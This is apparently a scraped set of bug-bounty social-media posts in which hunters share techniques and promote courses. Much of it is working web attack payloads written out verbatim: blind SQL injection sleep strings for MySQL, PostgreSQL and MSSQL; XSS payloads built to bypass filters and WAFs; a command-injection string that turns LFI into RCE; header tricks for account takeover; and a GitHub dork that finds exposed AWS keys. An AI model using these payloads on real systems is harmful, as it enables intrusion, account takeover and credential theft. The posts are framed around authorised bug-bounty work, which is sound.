Blind Sql injection in JSON: [-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))] {AnD SLEEP(5)}{1 AnD SLEEP(5)} {1' AnD SLEEP(5)--} {sleep 5} "emails":["AnD SLEEP(5)"] "emails":["[email protected]' OR SLEEP(5)#"] {"options":{"id":[],"emails":["AnD SLEEP(5)"],

SQL Injection Payload i was able to locate a SQL injection very hard to exploit , with digging I successfully got it with the sleep payload ''||(select 1 from (select pg_sleep(6))x)||' ==> i added as well to my SQL wordlist happy hunting ♥ #bugbountytips #bugbountytip

Hey #BugBounty hunters 👋 I’d like to share my latest finding: an interesting business-logic bug I discovered. #bugbountytips #hacking #CyberSecurity medium.com/@zack0x01_/bus…

Critical: GET /api/users/signed_in exposes PII & a reusable session cookie — token replay after logout allows account takeover. Reported via @Intigriti. #ResponsibleDisclosure #AppSec

certs.ine.com/1cbff24a-8aaf-…

Under project "The Sword" I present: 🛠️ etxNuclei Template Generator Submit CVE + POC → AI generates YAML → validated → uploaded to Slack Converts exploits to scan templates in seconds. No manual YAML writing. github.com/ethicxlhuman/n… #bugbounty #n8n

when you look for ATO, make sure that you go beyond x-forwarded-for. try at least the following, each individually. - x-forwarded-host - x-original-url - x-host - host I just found one via x-forwarded-host, while the rest did nothing or 421.

Save this. print it. hang it in the craphouse. review when you poop. get bounty when you hack. Simple

🚨 Doing a giveaway for my Blind XSS Masterclass Most people think they know XSS, until they meet blind XSS, the kind that fires where you’ll never see it. Same methods that helped me earn $250K+ from real reports. hhub.io/nahamsecbxss 🎁 Retweet and reply to enter.

الحمدلله Found exposed AWS keys in a public repo report triaged on bugcrowd . Using Github Dork: org:Target aws_access_key_id

Payload : 1%20and%20if(1%3d1%2c%20sleep(5)%2c%20false)%20--

Parameter: &Path= ❎LFI ✅RCE if you ever got a LFI vector parameter, then not just try LFI payloads. Payload for RCE: "|id||" Join my BugBounty telegram channel: t.me/ShellSec

Today was a day for retesting, and I found this other beauty: the payload was "><input%20onfocus=alert(1)%20autofocus> bypassed One more for Intigriti #BugBounty #bugbountytips #EthicalHacking 👾 I want to become a recognized insect hunter on the platform, so this is the bare

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>

I just published Directory Transversal lead to RCE | Manual hacking. medium.com/p/directory-tr…

Merry Christmas ';%20waitfor%20delay%20'0:0:6'%20--%20

Found an XSS bypass during a bug bounty: Backend was only stripping quotes ("), so payload like: <s"vg o"nload=al"ert() /> turns into a valid: <svg onload=alert()> 🚨 Never rely on poor input filtering! #BugBounty #CyberSecurity

Happy Arcanum-versary! Arcanum Information Security 's 1st giveaway for the week is FOUR seats to our EPIC Advanced Client-Side Hacking course by myself and xssdoctor ! 👍 1 Like = 1 Entry! ♻️ 1 Share = 2 Entries! Winners announced 1/21! Syllabus for the course below 👇

Day TWO of FIVE days of celebrating our 2 year ARCANUM-VERSARY! Arcanum Information Security 3rd Giveaway = FOUR seats to our new course by the_IDORminator "Zero to [BAC] Hero" ! 👍 1 Like = 1 Entry! ♻️ 1 Share = 2 Entries! Winners announced 1/21! Syllabus link below 👇

I’ve added here github.com/orwagodfather/… PDF file for XSS, it can bypass any waf for who looking for Stored XSS , and it can be changed to blind if you want to Simply I encoded the payload as ASCII hex You can edit the payload over notepad++ #bugbountytips #bugbountytip